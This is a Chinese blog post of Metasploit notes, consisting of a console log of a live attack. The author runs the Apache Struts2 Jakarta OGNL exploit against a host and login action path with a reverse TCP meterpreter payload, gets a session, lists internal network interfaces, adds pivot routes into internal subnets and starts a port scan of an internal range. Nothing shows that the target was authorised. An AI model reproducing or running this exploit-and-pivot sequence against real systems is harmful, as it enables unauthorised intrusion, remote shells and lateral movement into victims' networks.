Metasploit笔记

作者: Luan 分类: 学习笔记 发布时间: 2017-03-28 20:21
Last login: Tue Mar 28 18:32:40 2017 from 223.150.114.189
[root@Luan ~]# screen -ls
No Sockets found in /var/run/screen/S-root.

[root@Luan ~]# screen    

[root@Luan ~]# msfconsole
bash: msfconsole: command not found
[root@Luan ~]# cd /opt
[root@Luan opt]# cd metasploit-framework/
[root@Luan metasploit-framework]# cd bin
[root@Luan bin]# ./msfconsole
                                                  
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v4.14.6-dev-                         ]
+ -- --=[ 1636 exploits - 935 auxiliary - 285 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search struts
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_parameters           2011-10-01       excellent  Apache Struts ParametersInterceptor Remote Code Execution
   exploit/multi/http/struts_default_action_mapper          2013-07-02       excellent  Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   exploit/multi/http/struts_dev_mode                       2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/struts_dmi_exec                       2016-04-27       excellent  Apache Struts Dynamic Method Invocation Remote Code Execution
   exploit/multi/http/struts_dmi_rest_exec                  2016-06-01       excellent  Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
   exploit/multi/http/struts_include_params                 2013-05-24       great      Apache Struts includeParams Remote Code Execution

msf exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT      8080                yes       The target port (TCP)
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/  yes       The path to a struts application action
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(struts2_content_type_ognl) > set rhost lu4n.com
rhost => lu4n.com
msf exploit(struts2_content_type_ognl) > set rport 80
rport => 80
msf exploit(struts2_content_type_ognl) > set targeturi /nice-bus/login!login.action
targeturi => /nice-bus/login!login.action
msf exploit(struts2_content_type_ognl
msf exploit(struts2_content_type_ognl) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      lu4n.com                      yes       The target address
   RPORT      80                            yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /nice-bus/login!login.action  yes       The path to a struts application action
   VHOST                                    no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST                          yes       The listen address
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(struts2_content_type_ognl) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(struts2_content_type_ognl) > set LHOST lu4n.com
LHOST => lu4n.com
msf exploit(struts2_content_type_ognl) > set LPORT 8889
LPORT => 8889
msf exploit(struts2_content_type_ognl) > run

[*] Started reverse TCP handler on 223.150.114.189:8889 
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 223.150.114.189
[*] Meterpreter session 1 opened (223.150.114.189:8889 -> 223.150.114.189:65359) at 2017-03-28 19:27:22 +0800


meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP LOOPBACK RUNNING 
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : eth0
Hardware MAC : 6c:0b:84:9b:14:52
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST 
IPv4 Address : 192.168.128.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6e0b:84ff:fe9b:1452
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : eth1
Hardware MAC : 6c:0b:84:9b:14:53
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST 
IPv4 Address : 10.23.2.234
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6e0b:84ff:fe9b:1453
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  4
============
Name         : eth2
Hardware MAC : 6c:0b:84:9b:14:54
MTU          : 1500
Flags        : BROADCAST MULTICAST 


Interface  6
============
Name         : eth3
Hardware MAC : 6c:0b:84:9b:14:55
MTU          : 1500
Flags        : BROADCAST MULTICAST 


Interface  8
============
Name         : usb0
Hardware MAC : 02:e0:ec:2e:7c:2f
MTU          : 1500
Flags        : BROADCAST MULTICAST 

meterpreter > route

IPv4 network routes
===================

    Subnet         Netmask        Gateway          Metric  Interface
    ------         -------        -------          ------  ---------
    0.0.0.0        0.0.0.0        192.168.128.254  0       eth0
    10.23.2.0      255.255.255.0  0.0.0.0          0       eth1
    192.168.128.0  255.255.255.0  0.0.0.0          0       eth0


IPv6 network routes
===================

    Subnet  Netmask                                  Gateway  Metric  Interface
    ------  -------                                  -------  ------  ---------
    ::1     ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       256     lo
    fe80::  ffff:ffff:ffff:ffff::                    ::       256     eth1
    fe80::  ffff:ffff:ffff:ffff::                    ::       256     eth0
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
Local subnet: 10.23.2.0/255.255.255.0
Local subnet: 192.168.128.0/255.255.255.0
Local subnet: ::1/ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Local subnet: fe80::/ffff:ffff:ffff:ffff::
Local subnet: fe80::/ffff:ffff:ffff:ffff::
meterpreter > route add 192.168.128.0 255.255.255.0 2
Creating route 192.168.128.0/255.255.255.0 -> 2
[-] stdapi_net_config_add_route: Operation failed: 95
meterpreter > run autoroute -s 192.168.128.0

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.128.0/255.255.255.0...
[+] Added route to 192.168.128.0/255.255.255.0 via 218.76.55.147
[*] Use the -p option to list all active routes
meterpreter > run autoroute -s 10.23.2.0

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.23.2.0/255.255.255.0...
[+] Added route to 10.23.2.0/255.255.255.0 via 218.76.55.147
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(struts2_content_type_ognl) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.23.2.0          255.255.255.0      Session 1
   192.168.128.0      255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.
msf exploit(struts2_content_type_ognl) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > set rhosts 192.168.128.1-255
rhosts => 192.168.128.1-255
msf auxiliary(tcp) > run
[*] 192.168.128.10 - Meterpreter session 1 closed.  Reason: Died
^C
[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(tcp) > sessions

Active sessions
===============

No active sessions.

msf auxiliary(tcp) >

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论